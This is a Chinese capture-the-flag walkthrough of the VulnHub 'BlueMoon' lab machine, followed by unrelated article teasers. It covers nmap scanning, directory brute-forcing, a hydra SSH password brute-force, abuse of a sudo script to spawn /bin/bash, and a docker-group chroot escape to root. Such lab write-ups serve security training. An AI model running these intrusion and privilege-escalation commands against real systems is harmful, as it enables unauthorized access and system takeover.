当前位置：首页 > news >正文

VulnHub：BlueMoon

news 2026/5/26 11:56:28

准备工作

靶机下载地址，下载完成后使用virtualbox打开虚拟机，网络设置修改为桥接。

信息收集

主机发现

攻击机ip：192.168.31.218，nmap扫描攻击机同网段存活主机。

nmap 192.168.31.0/24 -Pn -T4

目标靶机ip为：192.168.31.228

端口扫描

nmap 192.168.31.228 -A -p- -T4

目标靶机开放了21，22，80端口。

21端口ftp服务，vsftpd 3.0.3
22端口ssh服务，OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80端口http服务，Apache httpd 2.4.38

web站点信息收集

访问http服务，首页如下：

没什么信息，目录扫描dirsearch -u http://192.168.31.228，没信息，换个字典。

dirsearch -u http://192.168.31.228 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

找到一个隐蔽的目录hidden_text。访问结果如图：

Thank You指向另一个路径，访问得到一个二维码。

扫描内容如下：

#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF

渗透

FTP登录

根据web信息收集中二维码扫描内容，可知涉及FTP的简单的shell脚本的使用，ftp用户名是userftp，密码是ftpp@ssword，直接登录即可。这里我写的shell脚本，来显示文件列表（纯纯试一下ftp的简单shell脚本如何使用，都给出了用户名和密码直接登录即可，最终目的就是拿到ftp服务器中的两个文件）

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary                          # 设定传输方式为二进制方式
pwd                             # 查看FTP服务器上的当前工作目录
ls                              # 显示文件列表
bye                             # 推出ftp会话
EOF

执行shell脚本得到ftp当前工作目录，和文件列表。

修改一下shell脚本，下载FTP服务器上的文件。

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary  
get information.txt
get p_lists.txt
bye                             
EOF

执行脚本得到一个字典文件p_lists.txt和information.txt，information.txt内容如下：

Hello robin ...! I'm Already Told You About Your Password Weekness. I will give a Password list. you May Choose Anyone of The Password.

存在一个用户robin，并给出了密码字典，爆破吧。

ssh爆破

给出了用户名和字典，hydra爆破ssh。

hydra -l robin -P p_lists.txt ssh://192.168.31.228

得到密码：k4rv3ndh4nh4ck3r。

ssh登录过程中有点小问题，提示WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! ，解决方法如下：

ssh-keygen -R 192.168.31.228

之后正常登录即可。

get user1.txt!

接下来找到了user2.txt，但是仅jerry才有读权。

提权

sudo提权

sudo提权，sudo -l，发现可以通过/home/robin/project/feedback.sh提权到jerry。

feedback.sh当前仅有rx权限，放弃写入反弹shell的方法，直接执行，提示需要输入名字和目标机器。

sudo -u jerry ./feedback.shEnter Your Name:随便填一个
Enter You FeedBack About This Target Machine:/bin/bash

成功切换到jerry，注意到jerry用户加入了docker用户组。

获得一个交互式shell。

python3 -c 'import pty;pty.spawn("/bin/bash")'

get user2.txt!

docker容器提权

当前jerry用户是普通用户，且加入了docker组。有一个提权方式——普通用户利用docker容器提权。

补充：为什么能利用docker容器提权？因为用户创建一个docker容器后，容器内默认是root账户，会自动在命令前添加sudo。一个普通用户只要加入docker组就等同于root。

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

提权成功。

get root.txt!🎆

VulnHub：BlueMoon

准备工作靶机下载地址，下载完成后使用virtualbox打开虚拟机，网络设置修改为桥接。信息收集主机发现攻击机ip：192.168.31.218，nmap扫描攻击机同网段存活主机。 nmap 192.168.31.0/24 -Pn -T4 目标靶机ip为：192…...

编程日记 2024/8/16 17:40:54

处理filter里抛出的异常

Filter 的异常是在 org.apache.catalina.core.ApplicationFilterChain.internalDoFilter()这里扔出来的。Filter是tomcat负责调用执行的，所以会比 servlet（尤其是SpringMVC 的dispatcherServlet ）先执行，所以 Filter 里的错误&…...

编程日记 2024/8/16 17:39:53

IndexedDB深度解析：JavaScript的客户端数据库

IndexedDB是一个在用户浏览器中运行的低等级API，用于存储大量结构化数据。作为NoSQL数据库，IndexedDB为Web应用程序提供了丰富的数据存储能力，支持键值对存储、索引、事务和复杂查询等功能。本文将详细介绍IndexedDB的基本概念、工作原理、使…...

编程日记 2024/8/16 17:38:51

C语言中的函数指针和返回值为数组的函数指针对比

函数指针 //定义一个函数指针，函数的参数是int型，返回值为int typedef int （*func)(int);//定义一个函数指针，函数的参数是int*型，返回值为int* typedef int* (*func)(int *);定义一个返回值为数组指针的函数 //定义…...

编程日记 2024/8/16 17:37:50

根据字符串的长度和字符值的大小来对字符串切片进行排序

在 Go 语言中，根据字符串的长度和字符值的大小来对字符串切片进行排序。示例如下: package mainimport ("fmt""sort" )// 自定义类型，以实现排序接口 type byLengthAndValue []string// 实现 sort.Interface 的 Len 方法 func (s b…...

编程日记 2024/8/16 17:35:48

RabbitMQ 的工作原理

下面是rabbitmq 的工作原理图解 1、客户端连接到消息队列服务器，打开一个channel。 2、客户端声明一个exchange，并设置相关属性。 3、客户端声明一个queue，并设置相关属性。 4、客户端使用routing key， 在exchange和queue 之间…...

编程日记 2024/8/16 17:34:46

WPF 资源、引用命名空间格式、FrameworkElement、Binding、数据绑定

资源对象级别独立文件静态资源使用(StaticResource)指的是在程序载入内存时对资源的一次性使用，之后就不再去访问这个资源了。动态资源使用（DynamicResource）使用指的是在程序运行过程中仍然会去访问资源。显然，如果你确定…...

编程日记 2024/8/16 17:32:44

vue3-03-创建响应式数据的几种方法

响应式数据一、 ref 创建：响应式数据1）ref 创建：基本类型的响应式数据2）ref 创建：对象类型的响应式数据3）volar 插件自动添加 .value4）customRef 自定义 ref 二、 reactive 创建：响…...

编程日记 2024/8/16 17:31:43

stm32智能颜色送餐小车（openmv二维码识别+颜色识别+oled显示）

大家好啊，我是情谊，今天我们来介绍一下我最近设计的stm32产品，我们在今年七月份的时候参加了光电设计大赛，我们小队使用的就是stm32的智能送餐小车，虽然止步于省赛，但是还是一次成长的经验吧，那…...

编程日记 2024/8/16 17:28:39

对接的广告平台越多，APP广告变现的收益越高？

无论是游戏、社交、工具应用类APP还是泛娱乐类APP，流量变现的方式主要有广告、内购、订阅三种方式。其中，广告变现是门槛最低、适用最广的变现方式。只要APP有流量，就可以进行广告变现，让APP的流量快速转化为商业价值。作为最常…...

编程日记 2024/8/16 17:25:36

LINUX原始机安装JDK

文章目录下载 JDK压缩包创建jdk文件夹sftp 远程上传解压缩 tar -zxvf 包名配置环境变量刷新环境变量验证是否安装成功安装JAVA 依赖yum更新及替换镜像curl 命令下载更新更新yum依赖判断repo文件是否存在生成缓存、启用阿里云镜像重新下载java依赖再次验证hello world 下载 J…...

编程日记 2024/8/16 17:24:35

MR400D工业级带网口4G DTU：RS232/RS485 TO LTE深度测评

在物联网技术日新月异的今天，数据传输的效率和稳定性成为了各行各业关注的焦点。作为一款集先进性与实用性于一身的物联网设备，工业级带网口的4G DTU（数据传输单元）以其强大的功能特性和广泛的应用场景，赢得了市场的广…...

编程日记 2024/8/16 17:23:33

第四范式发布AI+5G视频营销产品助力精准获客与高效转化

产品上新 Product Release 今天，第四范式AI5G视频电话互动营销产品全新发布。相较于以往销效率低、互动差、转化差的传统电话外呼和短信营销方式，视频电话互动营销基于AI、5G等技术，可让用户接听电话时观看个性化视频广告并实时互动&#xf…...

编程日记 2024/8/16 17:21:31

DVWA-IDS测试（特殊版本）

起因浏览DVWA历史更新记录发现有版本带有IDS插件，可以用于平时没有相关设备等场景演示用，所以开启本次测试。下载官方最新版本是移除了IDS插件，原因是“从不使用”，所以需要下载移除该插件之前的版本。 https://github.com/…...

编程日记 2024/8/16 17:20:30

轻度自闭症的温柔启航：星启帆的康复之旅

在儿童成长的道路上，自闭症作为一种复杂的神经发展障碍，给许多家庭带来了挑战与困扰。轻度自闭症，作为自闭症谱系中的一个类型，其症状表现相对较轻，但同样需要我们的关注与科学的干预。星启帆自闭症儿童康复机构&#…...

编程日记 2024/8/16 17:19:29

一、OpenTK简介

文章目录一、历史和发展二、功能和优势（一）强大的图形渲染功能（二）跨平台支持（三）与 C# 的紧密集成（四）开源和活跃的社区（五）性能优化三、适用场景（一）游戏开发（二）科学计算可视化（三）虚拟现实和增强现实应用（四）图形用户界面开发（五）教育和培训应用（六）…...

编程日记 2024/8/16 17:17:27

Dom4j详细介绍

Dom4j 1.1 解析概览将数据存储为XML格式后，程序化地访问这些数据变得至关重要。虽然Java基础的IO操作能够实现这一目标，但这一过程往往既复杂又繁琐，尤其是在处理大型文件或需要频繁读写操作的场景下。为了解决这些问题，开发者…...

编程日记 2024/8/16 17:16:25

thissuper

this&super 一、 this this关键字表示调用的是当前类的成员变量或者成员方法一般情况下，可以省略this关键字直接调用成员变量以及成员方法但当方法的形参与成员变量同名时，如果要在方法内使用成员变量，必须添加this关键字指明使用的是…...

编程日记 2024/8/16 17:14:22

cv::normalize（）

cv::normalize()函数是OpenCV库中用于对矩阵或图像数据进行归一化处理的工具。归一化是图像处理和计算机视觉中常见的预处理步骤，它可以确保数据在一定范围内，从而有助于后续的处理和算法的稳定性和性能。cv::normalize()函数可以将输入矩阵的值缩放到一…...

编程日记 2024/8/16 17:12:20

【Python快速入门和实践016】Python常用脚本-对视频抽取指定帧数并保存

一、功能介绍这段代码的功能是从一个视频文件中抽取指定数量的帧，并将这些帧保存为图像文件。步骤如下： 设置路径和参数： video_path：视频文件的路径。image_folder：保存抽取图像的目录。num_frames_to_extract&#…...

编程日记 2024/8/16 17:09:17

本地柴油发电机组排行2023年最新榜单

柴油发电机是通过燃烧柴油驱动发动机，进而发电的设备，广泛应用于电力中断或无电网地区。1. 柴油发电机的核心工作原理是什么？柴油发电机是一种将化学能转化为电能的设备，其核心是柴油发动机与交流发电机的组合。当柴油在发动机内燃…...

编程新知 2026/5/26 3:05:52

Rydberg原子量子门实现原理与优化技术

1. Rydberg原子平台中的量子门实现基础1.1 Rydberg原子特性与量子计算优势Rydberg原子是指外层电子被激发到高主量子数能级的原子态，这类原子具有三个关键特性使其成为量子计算的理想平台：强偶极-偶极相互作用：当两个原子同时处于Rydberg态时…...

编程新知 2026/5/26 3:05:50

对称与负电源测试：动态直流电子负载的设计、原理与应用

1. 项目概述：对称与负电源的静态与动态直流负载在电子实验室里，测试一个电源的性能，尤其是它的动态响应能力，是件既基础又关键的事。我们常说的“直流电子负载”就是这个领域的核心工具。我之前设计并分享过一个用于正电源测试的静…...

编程新知 2026/5/26 2:09:22

如何让Rhino 3D模型在Blender中保持完整数据：import_3dm插件深度解析

如何让Rhino 3D模型在Blender中保持完整数据：import_3dm插件深度解析【免费下载链接】import_3dm Blender importer script for Rhinoceros 3D files 项目地址: https://gitcode.com/gh_mirrors/im/import_3dm 当建筑师需要在Blender中渲染Rhino设计的建筑模…...

编程新知 2026/5/26 0:20:12

LVGL多页面开发避坑：用内部Timer替代轮询，解决页面切换时的内存踩踏问题

LVGL多页面开发中的内存安全实践：用Timer机制替代轮询的工程解决方案在嵌入式UI开发中，LVGL因其轻量级和跨平台特性成为热门选择。但当项目复杂度提升到多页面交互时，开发者往往会遇到一个棘手问题：如何在频繁切换页面的同时保证…...

编程新知 2026/5/25 21:15:34

特定任务需求场景下的过约束并联机构构型设计与控制方法【附代码】

✨ 长期致力于曲面加工、构型综合、运动学和动力学建模、性能评价、多目标优化、滑模控制、鲁棒控制、视觉传感技术研究工作，擅长数据搜集与处理、建模仿真、程序编写、仿真设计。 ✅ 专业定制毕设、代码 ✅ 如需沟通交流，点击《获取方式》 （…...

编程新知 2026/5/25 21:05:31

别让依赖毁了你的实验：记一次Vision Mamba复现中causal_conv1d与mamba-ssm的版本“打架”事件

Vision Mamba复现实战：破解依赖冲突的工程化解决方案在深度学习项目的复现过程中，依赖管理往往是最容易被忽视却又最常导致问题的环节。最近在复现Vision Mamba模型时，我遭遇了一场典型的Python依赖"战争"——causal_conv1d与mamba…...

编程新知 2026/5/25 17:44:08

ComfyUI-WD14-Tagger：AI智能图像标签提取的终极完整指南

ComfyUI-WD14-Tagger：AI智能图像标签提取的终极完整指南【免费下载链接】ComfyUI-WD14-Tagger A ComfyUI extension allowing for the interrogation of booru tags from images. 项目地址: https://gitcode.com/gh_mirrors/co/ComfyUI-WD14-Tagger 在AI图像…...

编程新知 2026/5/25 15:50:11